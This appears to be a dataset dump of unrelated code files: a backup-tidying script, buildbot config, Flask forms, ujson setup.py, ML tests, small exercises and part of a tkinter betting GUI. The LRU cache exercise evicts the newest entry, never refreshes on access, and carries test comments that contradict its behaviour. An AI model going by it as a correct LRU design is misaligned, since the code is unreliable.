list_fibo.append(bigger)\n \n new=smaller+bigger\n smaller=bigger\n bigger=new\n \nprint(sum(list_fibo))","sub_path":"Week01/Problem02/psarikhani_02.py","file_name":"psarikhani_02.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"645112399","text":"# tidy the working folder where backups are created. keep only the last num_backups_to_keep files, provided\n# that they have been backed up to backup_folder.\nimport os\nimport glob\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\nworking_folder = \"/home/pi/.octoprint/data/backup\"\nbackup_folder = \"/mnt/nasty_backup\"\nnum_backups_to_keep = 3\n\nassert(os.path.exists(backup_folder))\nassert(os.path.exists(working_folder))\n\n# move to working folder and get a backup file listing\nos.chdir(working_folder)\nfiles = glob.glob(\"*.zip\")\n\n# sort files by modification date (ascending)\nfiles.sort(key=os.path.getmtime)\n\n# find the files to delete. we will keep the most recent ones\ndel_files = files[:-num_backups_to_keep]\n\n# check if these files have been copied to the mount point\nbackup_files = glob.glob(os.path.join(backup_folder,\"*.zip\"))\nbackup_files = [os.path.basename(x) for x in backup_files]\ndel_files = [x for x in del_files if x in backup_files]\nnot_backed_up_files = [x for x in files if x not in backup_files]\n\nlogging.info(\"Not backed up: \\n\" + \"\\n\".join(not_backed_up_files))\nlogging.info(\"To delete: \\n\" + \"\\n\".join(del_files))\n\n# now delete the files\nfor file in del_files:\n if os.path.exists(file):\n os.remove(file)\n logging.info(\"Deleted \" + file)\n\nlogging.info(\"Backup tidying complete\")\n\n","sub_path":"tidy_folder.py","file_name":"tidy_folder.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"29273852","text":"# Copyright 2014 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom master import master_config\nfrom master.factory import chromeos_factory\n\ndefaults = {}\n\nhelper = master_config.Helper(defaults)\nB = helper.Builder\nF = helper.Factory\n\n# CrOS ASan bots below.\ndefaults['category'] = '4chromeos asan'\n\n_ASAN_SCHEDULER_NAME = 'chromium_src_asan'\nhelper.Scheduler(_ASAN_SCHEDULER_NAME, branch='master', treeStableTimer=60)\n\ndef Builder(dname, sname, flavor, root, board):\n fname = '%s-%s' % (sname, flavor)\n B('%s (%s) Asan' % (dname, sname),\n factory=fname,\n gatekeeper='crosasantest',\n builddir='%s-tot-chromeos-%s-asan' % (flavor, board),\n scheduler=_ASAN_SCHEDULER_NAME,\n notify_on_missing=True)\n F(fname,\n chromeos_factory.CbuildbotFactory(\n buildroot='/b/cbuild/%s' % root,\n pass_revision=True,\n params='%s-tot-asan-informational' % board).get_factory())\n\n\nBuilder('Chromium OS', 'x86', 'chromium', 'shared_external', 'x86-generic')\nBuilder('Chromium OS', 'amd64', 'chromium', 'shared_external', 'amd64-generic')\n\ndef Update(_config, _active_master, c):\n return helper.Update(c)\n","sub_path":"masters/master.chromiumos.chromium/master_asan_cfg.py","file_name":"master_asan_cfg.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445278684","text":"#coding: utf-8\nfrom flask_wtf import Form\nfrom wtforms import StringField,IntegerField,SelectField, DateTimeField\n\n\nclass RuleForm(Form):\n category = StringField('category')\n rule = StringField('rule')\n threshold = IntegerField('threshold')\n type = SelectField('type')\n behavior = SelectField('behavior')\n description = SelectField('description')\n\nclass ExecTaskForm(Form):\n time = DateTimeField(u'time' ,format='%H:%M')\n datetime = DateTimeField(u'datetime' ,format='%Y-%m-%d %H:%M')\n type = SelectField('type')","sub_path":"skynet/app/modules/main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"115619863","text":"\"\"\"\nCopyright (c) 2011-2012, ESN Social Software AB and Jonas Tarnstrom\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n * Neither the name of the ESN Social Software AB nor the\n names of its contributors may be used to endorse or promote products\n derived from this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL ESN SOCIAL SOFTWARE AB OR JONAS TARNSTROM BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nPortions of code from:\nMODP_ASCII - Ascii transformations (upper/lower, etc)\nhttp://code.google.com/p/stringencoders/\nCopyright (c) 2007 Nick Galbreath -- nickg [at] modp [dot] com. All rights reserved.\n\"\"\"\n\nfrom distutils.core import setup, Extension\nimport distutils.sysconfig\nimport shutil\nimport os.path\nimport re\n\nCLASSIFIERS = filter(None, map(str.strip,\n\"\"\"\nDevelopment Status :: 5 - Production/Stable\nIntended Audience :: Developers\nLicense :: OSI Approved :: BSD License\nProgramming Language :: C\nProgramming Language :: Python :: 2.4\nProgramming Language :: Python :: 2.5\nProgramming Language :: Python :: 2.6\nProgramming Language :: Python :: 2.7\n\"\"\".splitlines()))\n\ntry:\n\tshutil.rmtree(\"./build\")\nexcept(OSError):\n\tpass\n\nmodule1 = Extension('ujson',\n sources = ['./python/ujson.c', './python/objToJSON.c', './python/JSONtoObj.c', './lib/ultrajsonenc.c', './lib/ultrajsondec.c'],\n include_dirs = ['./python', './lib'])\n\ndef get_version():\n\tfilename = os.path.join(os.path.dirname(__file__), './python/version.h')\n\tfile = None\n\ttry:\n\t\tfile = open(filename)\n\t\theader = file.read()\n\tfinally:\n\t\tif file:\n\t\t\tfile.close()\n\tm = re.search(r'#define\\s+UJSON_VERSION\\s+\"(\\d+\\.\\d+(?:\\.\\d+)?)\"', header)\n\tassert m, \"version.h must contain UJSON_VERSION macro\"\n\treturn m.group(1)\n\nsetup (name = 'ujson',\n version = get_version(),\n description = \"Ultra fast JSON encoder and decoder for Python\",\n ext_modules = [module1],\n author=\"Jonas Tarnstrom\",\n author_email=\"jonas.tarnstrom@esn.me\",\n download_url=\"http://github.com/esnme/ultrajson\",\n license=\"BSD License\",\n platforms=['any'],\t \n\t url=\"http://www.esn.me\",\n classifiers=CLASSIFIERS,\n\t )","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"584237465","text":"import numpy as np\n\ndef get_dos_iws(iws):\n \"\"\"Calculate DOS with IWs.\n Parameter\n ----------\n iws : ndarray, float, shape=(((nqpoints, nfreq, nmodes)))\n nqpoints : integer\n # of q-points\n nfreq : integer\n # of frequencies\n nmodes : integer\n # of modes\n\n Return\n ----------\n dos : array, float, shape=(nfreq,)\n\n \"\"\"\n nfreq = len(iws[0])\n dos = np.zeros(nfreq)\n for ifreq in range(nfreq):\n dos[ifreq] = np.sum(iws[:,ifreq,:])\n return dos\n\ndef cal_dos_f2(thm, weights, freqs=None, f2s=None):\n \"\"\"Calculator of DOS from integration weights\n Parameters\n ---------------\n freqs : array, float, shape=(nfreq)\n thm : TetrahedronMethod\n See descriptions in Phonopy in detail\n weights : array, float, shape=(nqpoints,)\n Weight of each q-points\n Type is float, but in fact, integer.\n \n nfreq : integer\n = len(freqs)\n nqpoints : integer\n # of q-points\n \n Return\n ---------\n dos : array, float, shape=(ndiv,)\n Calculated DOS\n \"\"\"\n if f2s is None:\n if freqs is not None:\n f2s = freqs**2\n else:\n print(\"Error: input a list of frequencies.\")\n import sys\n sys.exit()\n thm.set(value='I', frequency_points=f2s)\n dos = np.zeros_like(f2s)\n for iq, iw in enumerate(thm):\n dos += np.sum(iw * weights[iq], axis=1)\n \n return dos\n \ndef get_dos_green(g0, multiplicity=None):\n \"\"\"Calculate phonon DOS using Green's function at a given frequency\n Parameters\n ------------\n g0 : ndarray, complex, shape=((3*natoms, 3*natoms))\n Green's function of the pure crystal\n #nat_prim : integer\n # # of atoms in the primitive cell\n \"\"\"\n if multiplicity is None:\n multi_long = np.ones(len(g0))\n else:\n if 3*len(multiplicity) != len(g0):\n print(\"Error {:d} != {:d}\".format(\n 3*len(multiplicity),\n len(g0)))\n import sys\n sys.exit()\n \n multi_long = np.zeros(len(g0))\n for i in range(len(multiplicity)):\n multi_long[3*i:3*(i+1)] = multiplicity[i] * np.ones(3)\n dos = (np.sum(np.diag(np.imag(g0))/multi_long) / np.pi)\n return dos\n\n\n","sub_path":"pyscat/calc/dos.py","file_name":"dos.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"645419296","text":"import os\nimport tempfile\nfrom typing import Any, Dict, List, Set\nfrom unittest import mock\n\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom ludwig.api import LudwigModel\nfrom ludwig.constants import COLUMN, INPUT_FEATURES, NAME, OUTPUT_FEATURES, PREPROCESSING, SPLIT, TRAINER, TYPE\nfrom tests.integration_tests.utils import category_feature, generate_data, number_feature\n\ntry:\n import dask.dataframe as dd\n\n from ludwig.automl.automl import create_auto_config, train_with_config\n from ludwig.hyperopt.execution import RayTuneExecutor\nexcept ImportError:\n pass\n\n\n@pytest.fixture(scope=\"module\")\ndef test_data():\n with tempfile.TemporaryDirectory() as tmpdir:\n input_features = [\n number_feature(),\n number_feature(),\n category_feature(encoder={\"vocab_size\": 3}),\n category_feature(encoder={\"vocab_size\": 3}),\n ]\n output_features = [category_feature(decoder={\"vocab_size\": 3})]\n dataset_csv = generate_data(\n input_features, output_features, os.path.join(tmpdir, \"dataset.csv\"), num_examples=100\n )\n yield input_features, output_features, dataset_csv\n\n\n@pytest.mark.distributed\n@pytest.mark.parametrize(\"tune_for_memory\", [True, False])\ndef test_create_auto_config(tune_for_memory, test_data, ray_cluster_2cpu):\n input_features, output_features, dataset_csv = test_data\n targets = [feature[NAME] for feature in output_features]\n df = dd.read_csv(dataset_csv)\n config = create_auto_config(df, targets, time_limit_s=600, tune_for_memory=tune_for_memory, backend=\"ray\")\n\n def to_name_set(features: List[Dict[str, Any]]) -> Set[str]:\n return {feature[NAME] for feature in features}\n\n assert to_name_set(config[INPUT_FEATURES]) == to_name_set(input_features)\n assert to_name_set(config[OUTPUT_FEATURES]) == to_name_set(output_features)\n\n\ndef _get_sample_df(class_probs):\n nrows = 1000\n thresholds = np.cumsum((class_probs * nrows).astype(int))\n\n df = pd.DataFrame(np.random.randint(0, 100, size=(nrows, 3)), columns=[\"A\", \"B\", \"C\"])\n\n def get_category(v):\n if v < thresholds[0]:\n return 0\n if thresholds[0] <= v < thresholds[1]:\n return 1\n return 2\n\n df[\"category\"] = df.index.map(get_category).astype(np.int8)\n return df\n\n\n@pytest.mark.distributed\ndef test_autoconfig_preprocessing_balanced():\n df = _get_sample_df(np.array([0.33, 0.33, 0.34]))\n\n config = create_auto_config(dataset=df, target=\"category\", time_limit_s=1, tune_for_memory=False)\n\n assert PREPROCESSING not in config\n\n\n@pytest.mark.distributed\ndef test_autoconfig_preprocessing_imbalanced():\n df = _get_sample_df(np.array([0.6, 0.2, 0.2]))\n\n config = create_auto_config(dataset=df, target=\"category\", time_limit_s=1, tune_for_memory=False)\n\n assert PREPROCESSING in config\n assert SPLIT in config[PREPROCESSING]\n assert config[PREPROCESSING][SPLIT] == {TYPE: \"stratify\", COLUMN: \"category\"}\n\n\n@pytest.mark.distributed\n@pytest.mark.parametrize(\"time_budget\", [200, 1], ids=[\"high\", \"low\"])\ndef test_train_with_config(time_budget, test_data, ray_cluster_2cpu, tmpdir):\n input_features, output_features, dataset_csv = test_data\n config = {\n \"input_features\": input_features,\n \"output_features\": output_features,\n \"trainer\": {\"epochs\": 2},\n \"hyperopt\": {\n \"search_alg\": {\n \"type\": \"hyperopt\",\n \"random_state_seed\": 42,\n },\n \"executor\": {\n \"type\": \"ray\",\n \"time_budget_s\": time_budget,\n \"cpu_resources_per_trial\": 1,\n \"scheduler\": {\n \"type\": \"async_hyperband\",\n \"max_t\": time_budget,\n \"time_attr\": \"time_total_s\",\n \"grace_period\": min(72, time_budget),\n \"reduction_factor\": 5,\n },\n },\n \"parameters\": {\n \"trainer.batch_size\": {\n \"space\": \"choice\",\n \"categories\": [64, 128, 256],\n },\n \"trainer.learning_rate\": {\n \"space\": \"loguniform\",\n \"lower\": 0.001,\n \"upper\": 0.1,\n },\n },\n },\n }\n\n fn = RayTuneExecutor._evaluate_best_model\n with mock.patch(\"ludwig.hyperopt.execution.RayTuneExecutor._evaluate_best_model\") as mock_fn:\n # We need to check that _evaluate_best_model is called when the time_budget is low\n # as this code path should be triggered when the trial was early stopped\n mock_fn.side_effect = fn\n\n outdir = os.path.join(tmpdir, \"output\")\n results = train_with_config(dataset_csv, config, output_directory=outdir)\n best_model = results.best_model\n\n if time_budget > 1:\n assert isinstance(best_model, LudwigModel)\n assert best_model.config[TRAINER][\"early_stop\"] == -1\n assert mock_fn.call_count == 0\n else:\n assert best_model is None\n assert mock_fn.call_count > 0\n","sub_path":"tests/integration_tests/test_automl.py","file_name":"test_automl.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"246997475","text":"class Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n r = {}\n res = []\n for n in nums:\n if n not in r:\n r[n] = 1\n else:\n r[n] += 1\n r = sorted(r.items(),key=lambda x:x[1],reverse=True)\n for i in range(k):\n res.append(r[i][0])\n# print(res)\n return res","sub_path":"347. Top K Frequent Elements.py","file_name":"347. Top K Frequent Elements.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"525140010","text":"# type: ignore\nimport sys\n\n_old_hook = sys.excepthook\n\n# I don't want to be sued my MS so I'll use a single 'p'\nclipy = \"\"\"\n _-_ | /\n/_ \\\\ |/\n(o)(o)\n| | |\n| \\\\/ /\n\\\\ |\n ¯--¯\"\"\"\n\n\ndef assistant_print(type_, value, tb):\n _old_hook(type_, value, tb)\n width = len(f\"{type_.__qualname__}{f': {value}' if value else ''}\")-2\n print(f\"\\\\{'_'*width}/\" + clipy)\n\n\n\nsys.excepthook = assistant_print\n","sub_path":"coding_assistant/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"168041477","text":"class Node:\n def __init__(self, value=None):\n self.value = value\n self.next = 0\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n self.length = 0\n\n def push(self, value):\n newNode = Node(value)\n if(self.head is None):\n self.head = newNode\n self.tail = self.head\n else:\n self.tail.next = newNode\n self.tail = newNode\n self.length += 1\n\n def remove_first(self):\n newHead = self.head.next\n self.head = newHead\n self.length -= 1\n\n def remove_last(self):\n current = self.head\n newtail = current\n while(current.next):\n newtail = current\n current = current.next\n self.tail = newtail\n self.tail.next = None\n self.length -= 1\n return current.value\n\n def getNode(self, index):\n count = 0\n head = self.head\n while(index != count):\n head = head.next\n count += 1\n return head\n\n def remove(self, index):\n if index == 0:\n return self.remove_first()\n if index == self.length-1:\n return self.remove_last()\n prevNode = self.getNode(index-1)\n removeNode = prevNode.next\n prevNode.next = removeNode.next\n self.length -= 1\n\n def print_chain(self):\n arr = []\n head = self.head\n while(head):\n arr.append(head.value)\n head = head.next\n\n return arr\n\n\nll = LinkedList()\nll.push(2)\nll.push(3)\nll.push(4)\nll.push(5)\nll.remove(0)\nprint(ll.print_chain())\n\n\nclass LRU_Cache(object):\n\n def __init__(self, capacity):\n # Initialize class variables\n self.list = LinkedList()\n self.data = {}\n self.capacity = capacity\n\n def get(self, key):\n # Retrieve item from provided key. Return -1 if nonexistent.\n val = self.data.get(key)\n if(val):\n return val\n else:\n return -1\n\n def set(self, key, value):\n # Set the value if the key is not present in the cache. If the cache is at capacity remove the oldest item.\n if self.data.get(key):\n return\n if self.capacity == self.list.length:\n remove_key = self.list.remove_last()\n del self.data[remove_key]\n\n self.list.push(key)\n self.data[key] = value\n\n\nour_cache = LRU_Cache(5)\n\nour_cache.set(1, 1)\nour_cache.set(2, 2)\nprint(our_cache.get(1)) # returns 1\nprint(our_cache.get(2)) # returns 2\nprint(our_cache.get(3)) # return -1\n\n#Test Cases\n\nour_cache.set(3, 3)\nour_cache.set(4, 4)\nour_cache.set(5, 5)\nour_cache.set(6, 6)\n\n\nprint(our_cache.get(4)) # returns 4\nprint(our_cache.get(5)) # returns -1 Old Entry removed from the Data\nprint(our_cache.get(6)) # returns 6\n","sub_path":"P1_SHOW_ME_DATA_STRUCTURES/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"303680498","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkcalendar import DateEntry\r\nfrom PIL import Image, ImageTk\r\nimport psycopg2\r\nimport class_SQL\r\nimport datetime\r\nfrom dateutil import parser\r\nfrom tkinter import messagebox\r\nimport threading\r\nimport import_results\r\nimport stats\r\nimport reporting\r\nimport pandas as pd\r\nimport historical_data\r\n\r\n\r\nclass class_gestionnaire(object):\r\n \"\"\"création de l'interface graphique à plusieurs pages\"\"\"\r\n def __init__(self,fenetre):\r\n\r\n #instancie la classe pgsql\r\n self.cl = class_SQL.class_SQL()\r\n self.cl_report = reporting.rapport()\r\n #création de la fenetre tk\r\n self.master = fenetre\r\n #création de la barre de menu\r\n self.menubar = tk.Menu(self.master)\r\n #onglet importation des paris\r\n self.menubar.add_command(label = \"Importation des résultats\", command=self.page_import_resultats)\r\n #onglet statistiques\r\n self.menubar.add_command(label = \"Statistiques\", command = self.page_calcul_stats)\r\n #onglet importation des paris\r\n self.menubar.add_command(label = \"Importation des paris\", command = self.page_importation_paris)\r\n #onglet envoie email\r\n self.menubar.add_command(label = \"Envoi mail\", command = self.page_gestion_mail)\r\n\r\n #active la page importattiondes resultats\r\n self.page_import_resultats()\r\n\r\n #ajout de la barre de menu à la fenetre\r\n self.master.config(menu=self.menubar)\r\n\r\n def __del__(self):\r\n \"\"\"détruit la classe \"\"\"\r\n del self.cl\r\n del self.cl_report\r\n\r\n def destruction_fenetre(self):\r\n \"\"\"destruction des widgets de la fenetre \"\"\"\r\n for w in self.master.winfo_children():\r\n if str(w) != '.!menu':\r\n w.destroy()\r\n def desactive_menubar(self,onglet):\r\n \"\"\"désactive le menubar sauf les onglets indiqués\"\"\"\r\n for c in range(1,self.menubar.index(tk.END)+1):\r\n self.menubar.entryconfig(c,state='disabled')\r\n #active le menubar indiqué\r\n if onglet != 'ALL':\r\n self.menubar.entryconfig(onglet,state='normal')\r\n def active_menubar(self,onglet):\r\n \"\"\"active le menubar sauf les onglets indiqués\"\"\"\r\n for c in range(1,self.menubar.index(tk.END)+1):\r\n self.menubar.entryconfig(c,state='normal')\r\n #désactive le menubar indiqué\r\n if onglet != 'ALL':\r\n self.menubar.entryconfig(onglet,state='disabled')\r\n\r\n def page_statistiques(self):\r\n \"\"\"calcul des stats pour POWER BI\"\"\"\r\n #supprime les widgets de la fenetre\r\n self.destruction_fenetre()\r\n \r\n #active le menubar sauf Ampère\r\n self.active_menubar(\"Statistiques\")\r\n self.boutonStats = tk.Button(self.master,text= 'lance statistiques')\r\n self.boutonStats.config(width = 20,height = 3, command = lambda: self.thread_parallele(self.calcul_stats))\r\n self.boutonStats.pack()\r\n\r\n def calcul_stats(self):\r\n \"\"\"calcul les statistiques \"\"\"\r\n try:\r\n stats.stats()\r\n messagebox.showinfo('Succès', 'Statistiques calculées')\r\n except Exception as e:\r\n messagebox.showerror('Erreur',str(e))\r\n\r\n\r\n def page_gestion_mail(self):\r\n \"\"\"création de la page pour envoyer les mail\"\"\"\r\n #supprime les widgets de la fenetre\r\n self.destruction_fenetre()\r\n #active le menubar sauf Ampère\r\n self.active_menubar(\"Envoi mail\")\r\n #cadre pour la date\r\n self.cadredate = tk.Frame(self.master)\r\n self.cadredate.grid(row=1, column=1, padx=10,pady=10)\r\n #label date debut\r\n self.Label_date_debut = tk.Label(self.cadredate,text=\"Date début\")\r\n self.Label_date_debut.pack()\r\n #date debut\r\n self.date_debut = DateEntry(self.cadredate, width=20, background='orange',\r\n foreground='white', borderwidth=2,justify='center',year=2018, month=8, day=1)\r\n self.date_debut.pack(padx=10, pady=10)\r\n #label date fin\r\n self.Label_date_fin = tk.Label(self.cadredate,text=\"Date fin\")\r\n self.Label_date_fin.pack()\r\n #date fin\r\n self.date_fin = DateEntry(self.cadredate, width=20, background='orange',\r\n foreground='white', borderwidth=2,justify='center')\r\n self.date_fin.pack(padx=10, pady=10)\r\n\r\n #Création des widgets\r\n self.creation_widgets()\r\n\r\n var = tk.IntVar()\r\n \r\n #bouton pour envoyer le mail ou non\r\n self.check_mail = tk.Checkbutton(self.master, text=\"Envoi mail\", variable = var)\r\n self.check_mail.grid(row=4, column=1, padx=10,pady=10)\r\n\r\n\r\n #Bouton de lancement de la procédure\r\n self.bouton_lancement('Création des rapports')\r\n self.boutonLance.config(width = 20,height = 3, command = lambda: self.thread_parallele(self.creation_rapport(self.listeDroite.get(0,tk.END),self.date_debut.get_date(),self.date_fin.get_date(),var.get())))\r\n \r\n #Création de la listBox de gauche\r\n self.listeGauche.bind(\"\",self.ajoute_item_Gauche_Droite)\r\n #Création de la listBox de droite\r\n self.listeDroite.bind(\"\",self.ajoute_item_Droite_Gauche)\r\n #liste des portefeuilles dans la base pilote ampère\r\n self.liste_pers = self.liste_personne()\r\n \r\n #ajoute les fonds à la listBox de gauche\r\n self.ajoute_item_liste_droite(self.liste_pers)\r\n\r\n #association du spin bouton à une fonction\r\n self.SpinGauche.config(command = lambda: self.ajoute_item_liste_gauche(self.liste_pers))\r\n #association du spin bouton à une fonction\r\n self.SpinDroit.config(command = lambda: self.ajoute_item_liste_droite(self.liste_pers))\r\n\r\n\r\n def creation_rapport(self,liste_personne,date_debut,date_fin,envoi_mail):\r\n \"\"\"création des reporting et envoi de l'email\"\"\"\r\n\r\n #désactive les widgets\r\n self.activate_desactivate('disabled')\r\n\r\n liste_code = []\r\n date_d = pd.Timestamp(date_debut)\r\n date_f = pd.Timestamp(date_fin)\r\n #boucle sur les personnes\r\n for x in liste_personne:\r\n #ajoute le code dans une liste\r\n pos = x.find('-') +2\r\n liste_code.append(x[pos:len(x)])\r\n #création du reporting\r\n try:\r\n self.cl_report.gestion_rapport_platypus(date_d,date_f,liste_code,envoi_mail)\r\n messagebox.showinfo('Succès', 'Reporting créé avec succès')\r\n except Exception as e:\r\n messagebox.showerror('Erreur', str(e))\r\n\r\n #désactive les widgets\r\n self.activate_desactivate('normal')\r\n\r\n def page_calcul_stats(self):\r\n \"\"\"création de la page statistiques\"\"\"\r\n #supprime les widgets de la fenetre\r\n self.destruction_fenetre()\r\n \r\n #active le menubar sauf Ampère\r\n self.active_menubar(\"Statistiques\")\r\n\r\n\r\n #Création des widgets\r\n self.creation_widgets()\r\n self.creation_widgets_2()\r\n #Bouton de lancement de la procédure\r\n self.bouton_lancement('Calcul statistiques')\r\n self.boutonLance.config(width = 20,height = 3, command = lambda: self.thread_parallele(self.calcul_stats_2))\r\n \r\n #Création de la listBox de gauche champ\r\n self.listeGauche.bind(\"\",self.ajoute_item_Gauche_Droite)\r\n #Création de la listBox de droite champ\r\n self.listeDroite.bind(\"\",self.ajoute_item_Droite_Gauche)\r\n #Création de la listBox de gauche saison\r\n self.listeGauche_2.bind(\"\",self.ajoute_item_Gauche_Droite_2)\r\n #Création de la listBox de droite saison\r\n self.listeDroite_2.bind(\"\",self.ajoute_item_Droite_Gauche_2)\r\n #liste des portefeuilles dans la base pilote ampère\r\n self.liste_championnat = self.liste_champ()\r\n #liste des saisons dans la base résultats\r\n self.liste_sais = self.liste_saison()\r\n \r\n #ajoute les championnats à la listBox de gauche\r\n self.ajoute_item_liste_gauche(self.liste_championnat)\r\n #ajoute les championnats à la listBox de gauche\r\n self.ajoute_item_liste_gauche_2(self.liste_sais)\r\n\r\n #association du spin bouton à une fonction\r\n self.SpinGauche.config(command = lambda: self.ajoute_item_liste_gauche(self.liste_championnat))\r\n #association du spin bouton à une fonction\r\n self.SpinDroit.config(command = lambda: self.ajoute_item_liste_droite(self.liste_championnat))\r\n\r\n #association du spin bouton à une fonction\r\n self.SpinGauche_2.config(command = lambda: self.ajoute_item_liste_gauche_2(self.liste_sais))\r\n #association du spin bouton à une fonction\r\n self.SpinDroit_2.config(command = lambda: self.ajoute_item_liste_droite_2(self.liste_sais))\r\n\r\n\r\n def page_import_resultats(self):\r\n \"\"\"Création de la page ampère \"\"\"\r\n #supprime les widgets de la fenetre\r\n self.destruction_fenetre()\r\n \r\n #active le menubar sauf importation des resultats\r\n self.active_menubar(\"Importation des résultats\")\r\n\r\n\r\n #cadre pour la saison\r\n self.cadresaison = tk.Frame(self.master)\r\n self.cadresaison.grid(row=1, column=1, padx=10,pady=10)\r\n #Label pour chosir la date\r\n self.Label_saison = tk.Label(self.cadresaison,text=\"Saison\")\r\n self.Label_saison.pack()\r\n #textBox pour la date\r\n self.TextBox_saison = tk.Entry(self.cadresaison,justify='center')\r\n self.TextBox_saison.pack(padx=10, pady=10)\r\n self.TextBox_saison.insert(0, \"1920\")\r\n\r\n #Création des widgets\r\n self.creation_widgets()\r\n\r\n #Bouton de lancement de la procédure\r\n self.bouton_lancement('importation des résulats')\r\n self.boutonLance.config(width = 20,height = 2, command = lambda: self.thread_parallele(self.ajoute_resultats))\r\n \r\n #Création de la listBox de gauche\r\n self.listeGauche.bind(\"\",self.ajoute_item_Gauche_Droite)\r\n #Création de la listBox de droite\r\n self.listeDroite.bind(\"\",self.ajoute_item_Droite_Gauche)\r\n #liste des portefeuilles dans la base pilote ampère\r\n self.liste_championnat = self.liste_champ()\r\n \r\n #ajoute les fonds à la listBox de gauche\r\n self.ajoute_item_liste_droite(self.liste_championnat)\r\n\r\n #association du spin bouton à une fonction\r\n self.SpinGauche.config(command = lambda: self.ajoute_item_liste_gauche(self.liste_championnat))\r\n #association du spin bouton à une fonction\r\n self.SpinDroit.config(command = lambda: self.ajoute_item_liste_droite(self.liste_championnat))\r\n\r\n def bouton_lancement(self, libelle):\r\n \"\"\"création du bouton de lancement\"\"\"\r\n #bouton de lancement du programme\r\n self.boutonLance = tk.Button(self.master,text= libelle)\r\n self.boutonLance.grid(row=5, column=1, padx=10,pady=10)\r\n\r\n\r\n def update_team(self,code,date_ref,HT_AT,combobox,saison = None, div = None):\r\n \"\"\"liste des equipes dans le championnat et la saison\"\"\"\r\n\r\n #si division est vide\r\n if div == '':\r\n div = None\r\n #si saison est vide\r\n if saison == '':\r\n saison = None\r\n\r\n liste = self.cl.liste_team(code,date_ref,HT_AT,saison =saison,div =div)\r\n combobox['values'] = liste\r\n\r\n\r\n def update_saison(self,code,date_ref,div = None):\r\n \"\"\"liste des saisons en fonction de la division\"\"\"\r\n #si lal division est vide\r\n if div == '':\r\n div = None\r\n liste = self.cl.liste_saison(code, date_ref,div)\r\n self.choixSaison['values'] = liste\r\n\r\n def ajout_paris(self):\r\n \"\"\"ajoute un paris dans la base\"\"\"\r\n #si on a pas misé sur l'equipe domicile\r\n if self.miseHT.get() == '':\r\n miseHT = 'Null'\r\n else:\r\n miseHT = self.miseHT.get()\r\n #si on a pas misé sur l'equipe exterieure\r\n if self.miseAT.get() == '':\r\n miseAT = 'Null'\r\n else:\r\n miseAT = self.miseAT.get()\r\n\r\n\r\n\r\n result = self.cl.insert_mise(self.codeFonds.get(),self.choixSaison.get(),\r\n self.choixDiv.get(),self.Site.get(),\r\n self.choixHT.get(),self.choixAT.get(),\r\n miseHT,miseAT,\r\n self.Odd.get(),self.typeparis.get(),\r\n self.dateParis.get())\r\n if result == 'succès':\r\n messagebox.showinfo('Succès', 'Paris inséré avec succès dans la base')\r\n else:\r\n messagebox.showerror('Erreur', str(result))\r\n\r\n def calcul_vl(self):\r\n \"\"\"calcul les vl \"\"\"\r\n result = historical_data.calcul_vl()\r\n if result == 'succès':\r\n messagebox.showinfo('Succès', 'Vls calculées avec succès')\r\n else:\r\n messagebox.showerror('Erreur', str(result))\r\n\r\n\r\n def page_importation_paris(self):\r\n \"\"\"création de la page Reporting de gestion \"\"\"\r\n #supprime les widgets de la fenetre\r\n self.destruction_fenetre()\r\n #active le menubar sauf Fichier de transparisation\r\n self.active_menubar(\"Importation des paris\")\r\n\r\n #code du fonds\r\n code = 